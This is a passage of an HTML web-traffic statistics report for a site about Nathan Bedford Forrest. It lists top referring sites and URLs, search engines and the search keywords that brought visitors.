<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">19</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://random.yahoo.com/">http://random.yahoo.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">32</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">20</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://navigation.helper.realnames.com/">http://navigation.helper.realnames.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">27</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD> </TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Sub Total for the Referring Sites Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>10344</B></TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total for the Log File</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>10898</B></TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopReferers"><!--Referrers & Keywords::Top Referring URLs--></A>
<!-- WT_H1>Top Referring URLs</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Top Referring URLs</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->This section provides the full URLs of the sites with links to the site. This information will only be displayed if your server is logging the referrer information.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0><TR>
<TD><IMG SRC="index19.gif"></TD></TR></TABLE></CENTER><!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=3 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>3, .3, 4.7, 1</WT_TABLE_STATS -->
<CENTER><B>Top Referring URLs</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Top Referring URLs</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>URL</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>User Sessions</B></CENTER></TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="No Referrer">No Referrer</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4647</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://nbforrest.com/">http://nbforrest.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">846</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://nbforrest.com/nbf_pics.htm">http://nbforrest.com/nbf_pics.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">531</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://billslater.com/wfs_heroes.htm">http://billslater.com/wfs_heroes.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">515</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://www.freebank.com/">http://www.freebank.com/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">268</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://nbforrest.com/forrest.asp">http://nbforrest.com/forrest.asp</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">228</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://www.freebank.com/nbf_1875-07.htm">http://www.freebank.com/nbf_1875-07.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">189</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://billslater.com/wfs_sec_mywebwork.htm">http://billslater.com/wfs_sec_mywebwork.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">184</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://nbforrest.com/nbf_bye.htm">http://nbforrest.com/nbf_bye.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">166</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://www.freebank.com/nbf_pics.htm">http://www.freebank.com/nbf_pics.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">166</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://www.billslater.com/forrest.htm">http://www.billslater.com/forrest.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">130</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">12</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://billslater.com/wfs_domains.htm">http://billslater.com/wfs_domains.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">85</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://www.forrestmonument.org/">http://www.forrestmonument.org/</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">75</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://nbforrest.com/nbf_more.htm">http://nbforrest.com/nbf_more.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">70</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://www.freebank.com/forrest.asp">http://www.freebank.com/forrest.asp</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">63</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">16</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://nbforrest.com/nbf_controversies.htm">http://nbforrest.com/nbf_controversies.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">62</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">17</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://www.google.com/search?q=Nathan+bedford+Forrest">http://www.google.com/search?q=Nathan+bedford+Forrest</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">56</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">18</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://nbforrest.com/nbf_1875-07.htm">http://nbforrest.com/nbf_1875-07.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">53</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">19</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://nbforrest.com/nbf_memorial.htm">http://nbforrest.com/nbf_memorial.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">48</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">20</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B><A href="http://nbforrest.com/nbf_whats_new.htm">http://nbforrest.com/nbf_whats_new.htm</A></B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">44</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD> </TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Sub Total for the Referrers Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>8426</B></TD></TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total for the Log File</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>10898</B></TD></TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
<!-- WT_PAGEBREAK -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<a name="TopSearchEngines"><!--Referrers & Keywords::Top Search Engines--></A>
<!-- WT_H1>Top Search Engines</WT_H1 -->
<!-- Start Strip -->
<CENTER><TABLE BORDER=0 WIDTH=100%><TR>
<TD ALIGN=LEFT WIDTH=100% BGCOLOR="#0000FF"><FONT SIZE=4 FACE="Arial" COLOR="#FFFFFF"><B>Top Search Engines</B></FONT></TD>
<TD BGCOLOR="#FFFFFF"><PRE> </PRE></TD>
</TR></TABLE></CENTER>
<!-- End Strip -->
<P>
<!-- WT_CRLF -->
<FONT SIZE=3 FACE="Arial" COLOR="#000000"><!-- WT_DESCRIPTION -->The graphic illustrates the new user sessions initiated by searches from each search engine. The first table identifies which search engines referred visitors to the site the most often. Note that each search may contain several keywords. The second table identifies the main keywords for each search engine.<!-- /WT_DESCRIPTION --></FONT>
<!-- WT_CRLF -->
<!-- WT_CRLF -->
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=4 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>4, .3, 3.7, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Top Search Engines</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Top Search Engines</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=5%><B> </B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Engines</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Searches</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total</B></CENTER></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Yahoo</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">162</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">79.02%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Lycos</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">31</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15.12%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>AltaVista</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">8</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">3.9%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD WIDTH=10% ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Excite</B></TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.95%</TD></TR>
<TR BGCOLOR="#F0F0F0">
<TD> </TD>
<TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Total of Searches for the Engines Above</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>205</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>100%</B></TD>
</TR>
<TR BGCOLOR="#D0D0D0">
<TD> </TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>Total of Searches for the Log File</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>205</B></TD>
<TD ALIGN="CENTER"><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B>100%</B></TD>
</TR>
</TABLE></CENTER>
<!-- WT_CRLF -->
><HR><P>
</BODY>
<BODY BGCOLOR="#FFFFFF" BACKGROUND="">
<P><CENTER><TABLE BORDER=1 CELLSPACING=0 WIDTH=90%>
<TR BGCOLOR="#74C6F6">
<TD COLSPAN=4 ROWSPAN=1 NOWRAP><FONT SIZE=+1 FACE="Arial" COLOR="#000000">
<!-- WT_TABLE_STATS>4, 2, 2, 1
, 1
</WT_TABLE_STATS -->
<CENTER><B>Top Search Engines with Keywords Detail</B></CENTER></TD></TR>
<!-- WT_EXCEL_SHEET_NAME>Top Search Engines with Keywords Detail</WT_EXCEL_SHEET_NAME -->
<TR BGCOLOR="#D0D0D0">
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Engines</CENTER></B></TD>
<TD WIDTH=100%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><B><CENTER>Keywords</CENTER></B></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>Keywords Found</B></CENTER></TD>
<TD WIDTH=12%><FONT SIZE=3 FACE="Arial" COLOR="#000000"><CENTER><B>% of Total</B></CENTER></TD>
</TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Yahoo </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">forrest </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">82</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">40%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">bedford </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">58</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">28.29%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">nathan </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">55</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">26.82%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">of </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">21</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10.24%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">pictures </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">14</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6.82%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">the </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6.34%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">klux </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.36%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">klan </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">11</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">5.36%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">nathaniel </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">10</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.87%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">general </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4.39%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Lycos </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">forrest </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">20</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">9.75%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">nathan </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">15</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">7.31%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">bedford </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">13</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">6.34%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">general </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.95%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">brice's </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.97%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">benefield </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.97%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">pictures </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.97%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">1865 </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">2</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.97%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">andrew </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">crossroads </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>AltaVista </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">forrest </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.95%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">bearers </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">bedford </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">al </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">national </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">heritage </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">maeve </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">nathan </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">550 </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR>
<TR BGCOLOR="#F0F0F0"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B> </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">of </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">0.48%</TD></TR>
<TR BGCOLOR="#FFFFFF"><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000"><B>Excite </B></TD><TD><FONT SIZE=2 FACE="Arial" COLOR="#000000">forrest </TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">4</TD><TD ALIGN="CENTER"><FONT SIZE=2 FACE="Arial" COLOR="#000000">1.95%</TD></TR>
